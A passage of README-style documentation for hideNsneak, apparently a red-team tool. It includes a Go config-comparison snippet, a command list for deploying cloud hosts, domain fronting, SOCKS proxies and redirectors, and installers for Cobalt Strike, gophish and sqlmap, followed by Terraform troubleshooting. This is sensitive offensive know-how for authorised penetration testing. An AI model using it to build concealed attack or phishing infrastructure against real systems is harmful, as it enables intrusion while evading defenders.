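			problems = append(problems, "field only in first config: "+k)
		}
	}
	for k := range b {
		if _, ok := a[k]; !ok {
			problems = append(problems, "field only in second config: "+k)
		}
	}
	sort.Strings(problems)
	return problems
}

func main() {
	alice, err := ParseConfig([]byte(AliceConfigJSON))
	if err != nil {
		panic(err)
	}
	bob, err := ParseConfig([]byte(BobConfigJSON))
	if err != nil {
		panic(err)
	}
	fmt.Printf("alice missing required fields: %v\n", MissingRequired(alice))
	fmt.Printf("bob missing required fields:   %v\n", MissingRequired(bob))
	fmt.Printf("operator mismatches: %v\n", CompareOperators(alice, bob))
}
```

    Run this against each operator's config/config.json before the first shared deploy; a differing private_key is exactly the case that lets one operator provision hosts the others cannot SSH into.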

    Commands
    • hidensneak help --> run this anytime to get available commands
    • hidensneak instance deploy
    • hidensneak instance destroy
    • hidensneak instance list
    • hidensneak api deploy
    • hidensneak api destroy
    • hidensneak api list
    • hidensneak domainfront enable
    • hidensneak domainfront disable
    • hidensneak domainfront deploy
    • hidensneak domainfront destroy
    • hidensneak domainfront list
    • hidensneak firewall add
    • hidensneak firewall list
    • hidensneak firewall delete
    • hidensneak exec command -c
    • hidensneak exec nmap
    • hidensneak exec socat-redirect
    • hidensneak exec cobaltstrike-run
    • hidensneak exec collaborator-run
    • hidensneak socks deploy
    • hidensneak socks list
    • hidensneak socks destroy
    • hidensneak socks proxychains
    • hidensneak socks socksd
    • hidensneak install burp
    • hidensneak install cobaltstrike
    • hidensneak install socat
    • hidensneak install letsencrypt
    • hidensneak install gophish
    • hidensneak install nmap
    • hidensneak install sqlmap
    • hidensneak file push
    • hidensneak file pull
    For all commands, you can run --help after any of them to get guidance on what flags to use.

    Organization
    • _terraform --> terraform modules
    • _ansible --> ansible roles and playbooks
    • _assets --> random assets for the beauty of this project
    • _cmd --> frontend interface package
    • _deployer --> backend commands and structs
    • main.go --> where the magic happens

    IAM Permissions
    Google Domain Fronting
    • App Engine API Enabled
    • Cloud Functions API Enabled
    • Project editor or higher permissions

    Miscellaneous
    A default security group named hideNsneak is created in all AWS regions and is full-open (no filtering at the cloud layer). All instances are configured with iptables to allow only port 22/tcp upon provisioning, so the host's iptables rules are the only network-level filter in front of an instance: any port opened beyond 22/tcp is reachable from the whole internet unless a host rule restricts it.
    If your program starts throwing terraform errors indicating a resource is not found, then you may need to remove the problematic terraform resources. You can do this by running the following:
    cd $GOPATH/src/github.com/rmikehodges/hideNsneak/terraform
    terraform state rm <name of problem resource>
    This resource will need to be cleaned up manually if it still exists.

    Troubleshooting
    Error: configuration for module name here is not present; a provider configuration block is required for all operations
    This is usually due to artifacts being left in the state from old deployments. Below are instructions on how to remove those artifacts from your state. If they are live resources, they will need to be manually destroyed via the cloud provider's administration panel.
    • cd $GOPATH/src/github.com/rmikehodges/hideNsneak/terraform
    • terraform state rm <module or resource name>
    Error: Error locking state: Error acquiring the state lock: ConditionalCheckFailedException: The conditional request failed status code: 400, request id: P7BUM7NA56LQEJQC20A3SE2SOVVV4KQNSO5AEMVJF66Q9ASUAAJG Lock Info: ID: 4919d588-6b29-4aa7-d917-2bcb67c14ab4
    If this does not go away after another user has finished deploying, it is usually due to Terraform not automatically unlocking your state in the face of errors. This can be fixed by running the following:
    • terraform force-unlock <ID> $GOPATH/src/github.com/rmikehodges/hideNsneak/terraform
    Note that this unlocks the state for everyone, so it may have an adverse effect on any other writes happening in the state; make sure your other users are not actively deploying or destroying anything when you run this.

